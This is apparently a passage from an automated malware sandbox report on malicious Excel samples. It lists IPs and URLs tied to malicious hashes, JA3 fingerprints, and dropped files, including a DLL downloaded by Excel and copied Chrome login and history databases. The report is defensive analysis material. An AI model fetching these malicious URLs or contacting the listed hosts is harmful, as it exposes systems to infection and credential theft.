                                                                                              • 185.81.0.78
                                                                                              Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                              • 185.81.0.78
                                                                                              SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                                                              • 93.95.216.145
                                                                                              TelefonicadelPeruSAAPEnetworkmanagerGet hashmaliciousBrowse
                                                                                              • 200.106.178.58
                                                                                              vrhiyc.exeGet hashmaliciousBrowse
                                                                                              • 200.60.57.62
                                                                                              ucrcdh.exeGet hashmaliciousBrowse
                                                                                              • 200.60.57.62
                                                                                              lrbwh.exeGet hashmaliciousBrowse
                                                                                              • 200.60.57.62
                                                                                              ST6UNST.EXEGet hashmaliciousBrowse
                                                                                              • 200.60.57.62
                                                                                              MkisahOBqH.dllGet hashmaliciousBrowse
                                                                                              • 190.236.129.31
                                                                                              UnHAnaAW.x86Get hashmaliciousBrowse
                                                                                              • 181.116.130.217
                                                                                              1XA1buCbqqGet hashmaliciousBrowse
                                                                                              • 181.67.21.36
                                                                                              init.shGet hashmaliciousBrowse
                                                                                              • 190.233.154.126
                                                                                              GsQzmGULNs.exeGet hashmaliciousBrowse
                                                                                              • 200.60.71.194
                                                                                              RENIEC-PortalCiudadano-1.1.exeGet hashmaliciousBrowse
                                                                                              • 200.60.160.42
                                                                                              uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                                                                              • 190.43.238.216
                                                                                              http://jmf.uptpkkediri.info/zmail.php?http://info.zimbra.com/thank-you-for-email-confirmation?utm_medium=email&_hsenc=p2ANqtzCa1bdc729-a148-4578-8059-23d48b6f026fGet hashmaliciousBrowse
                                                                                              • 200.37.86.163
                                                                                              http://jmf.uptpkkediri.info/zmail.php?http://info.zimbra.com/thank-you-for-email-confirmation?utm_medium=email&_hsenc=p2ANqtzCa1bdc729-a148-4578-8059-23d48b6f026fGet hashmaliciousBrowse
                                                                                              • 200.37.86.163
                                                                                              58627839154_426938642.vbsGet hashmaliciousBrowse
                                                                                              • 190.238.147.115
                                                                                              x86Get hashmaliciousBrowse
                                                                                              • 200.121.166.111
                                                                                              Attn.docGet hashmaliciousBrowse
                                                                                              • 181.99.223.250
                                                                                              potymk-Invoice.doc.docGet hashmaliciousBrowse
                                                                                              • 181.99.223.250
                                                                                              3c#U0438.exeGet hashmaliciousBrowse
                                                                                              • 181.96.253.148
                                                                                              http://rupertsherwood.com/Templates/esp/b207qn1fc3l1lugdtga23zf0o_b178b9ps-936935507/Get hashmaliciousBrowse
                                                                                              • 181.65.214.222

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              8c4a22651d328568ec66382a84fc505fSecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              Sign-636.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.11712.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Heur.13393.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96
                                                                                              SecuriteInfo.com.Exploit.Siggen3.10048.21085.xlsGet hashmaliciousBrowse
                                                                                              • 193.8.194.96

                                                                                              Dropped Files

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesSecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                          SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                            SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                  SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                    Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                      Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                        Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                          Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                            Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                              Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                                                C:\Users\user\BASE.BABAASecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                    SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                      SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                        SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                          SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                            SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                              SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                  SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                    SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                      Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                        Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                                          Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                                            Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                                              Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                                                                Sign-707465831_1420670581.xlsGet hashmaliciousBrowse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):59134
                                                                                                                                                                  Entropy (8bit):7.995450161616763
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                  Entropy (8bit):3.061122521080951
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:kK+dPPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:6W3kPlE99SNxAhUeo+aKt
                                                                                                                                                                  MD5:DCA7983951C4C97EDFABEB19606FAC93
                                                                                                                                                                  SHA1:F90C214303F0E68DC0DF6EC02C90BFD3F9D95638
                                                                                                                                                                  SHA-256:A3B9D666803F2B940D3F1D1BB3CF64CE92D403E1C21FF53A9340BC225560882B
                                                                                                                                                                  SHA-512:8DC02AB04636EE2670511230320916032F432D573A86EE333A6957B81F7047B569A29007A645AEBBEAD84EB5DFE94335B78C485D6B5E1FD3EE2696C9B619632B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: p...... ........cM..o...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):122880
                                                                                                                                                                  Entropy (8bit):0.4753649773590379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:T7Y5Bk9MtTeBk9SYxNPM5ETQTQYysX0Xu132RUS5PtsikKLwQTR8+z3QH3eMwVaY:gHYJYsU+QYysX0CcFWeTVaN+LrL25sjF
                                                                                                                                                                  MD5:AEE054CEBAB27FF921F10325627DBAF4
                                                                                                                                                                  SHA1:FCE2FB98C6FB7F4B59877909B314F948BF91B19D
                                                                                                                                                                  SHA-256:380980EA5623B2D84A074DDE44C164554E3D2CBA0149F73C55EDE2D7F0220AA5
                                                                                                                                                                  SHA-512:0E5DDFFAB24764F852945602331949E903F039F285F07364F6D4BB1D4E09645F7C4A1E2020D915006BEFE365E07867FBC19DFA4B01D20A03166055D56AE4EBE1
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.7798653713156546
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                                                                                                                                  MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                                                                                                                                  SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                                                                                                                                  SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                                                                                                                                  SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                  Entropy (8bit):1.1340767975888557
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                                                                                                                                                  MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                                                                                                                                                  SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                                                                                                                                                  SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                                                                                                                                                  SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.bak
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):35549
                                                                                                                                                                  Entropy (8bit):6.06431092799383
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:2F3tAP0WdZWTHzO+EMvDBdIu++qtXQQJokdugILQ67IU4I9zrLWJ:k3O8Ni+RvDD5/qNQmduDKRIFrLWJ
                                                                                                                                                                  MD5:4E06FDEE66DA477D15AAAFD104802FF3
                                                                                                                                                                  SHA1:2814763828D036134EEF93F28D6C499913E903AA
                                                                                                                                                                  SHA-256:835ADDCE810330CA6D1FE5AA598CB758B639173086517BEBC6B0AAC7CBFDAA1D
                                                                                                                                                                  SHA-512:42521F28CAD2FEA206592962A999202FA65E4A398EF29B9A759DAFFAD60CA95E027ABB52E523C799E7C131A15B17CDFC46FEC102C48EF7569D381C6E47680F37
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"84.0.4147.89"},"easy_unlock":{"device_id":"f691bb0f-1b4f-4339-aef5-321b65f13447"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.595529173769173e+12,"network":1.595503998e+12,"ticks":494811744.0,"uncertainty":4224807.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADCJQEpL4peQLs/tCx05ts1AAAAAAIAAAAAABBmAAAAAQAAIAAAAHMdBSm688AB9E4ujGBlc8b12w9pH8Ho0MG5KX0s9TvsAAAAAA6AAAAAAgAAIAAAAKp70FMSZVCDUsFN1iNo5k0cdS+uI3XobvqN11pz11FbMAAAAHEgEYBv3dbmfqLRp8KY9FTYBCEdPLIJnBuQSIy6PW6ieb+TQlX0tlf+joBO06Pyo0AAAADT82DjaNvFLY7T0RywXTGepumesXXBFeM5MLg7ZlErGegSazITBqJVemjLdeT3R2c6H7dl+tlEXxt1m8SJWLUl"},"policy":{"last_statistics_update":"13240002771769952"},"profile":{"info_cache":{"Default":{"active_time":1595529172.199256,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_26","background_apps":false,"
                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:downloaded
                                                                                                                                                                  Size (bytes):4591104
                                                                                                                                                                  Entropy (8bit):5.0540147937501265
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                  MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                  SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                  SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                  SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-709986424_219667767.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-488964532_2104982999.xls, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Sign-707465831_1420670581.xls, Detection: malicious, Browse
                                                                                                                                                                  IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\40DE0000
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):155530
                                                                                                                                                                  Entropy (8bit):7.660535334181515
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXF:YEGSzx0dmxk7RbsYsKtseoXV
                                                                                                                                                                  MD5:941E9CD7C5A77CC75D438B12634F97ED
                                                                                                                                                                  SHA1:6CB03661FDECF7500E2D32CB5519F53E274D11A7
                                                                                                                                                                  SHA-256:0C0799AD1543EF4D74AF37CF70E377D2BC4C645D2AED6D00AC3027F6D770FD95
                                                                                                                                                                  SHA-512:A7480EDD2B3D88135F51024765B21E69917A7715DDD39AFE22E34F85F33E19F926BB85F7890315C2D8B9B608D3DD94667A69F3814ADE29A31A333DAAFCF1F581
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\CabE466.tmp
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):59134
                                                                                                                                                                  Entropy (8bit):7.995450161616763
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TarE467.tmp
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):152788
                                                                                                                                                                  Entropy (8bit):6.316654432555028
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                                                                                                  MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                                                                                                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                                                                                                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                                                                                                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 09:03:39 2021, atime=Sat Feb 20 09:03:39 2021, length=8192, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):867
                                                                                                                                                                  Entropy (8bit):4.478636841194367
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:85QocLgXg/XAlCPCHaXtB8XzB/qP6UX+WnicvbsW1bDtZ3YilMMEpxRljKHTdJP8:851K/XTd6jgyUYe7Dv3qWrNru/
                                                                                                                                                                  MD5:FF9482364E57CA13EECEAADDAA8344FA
                                                                                                                                                                  SHA1:11EF3A9E5A446CFD0586BED638C4E16134B9D96E
                                                                                                                                                                  SHA-256:D4C99F2CC2A0E54CF93FC16AB61498556E4AFA0016FF315A225D4B8CF7FBDE07
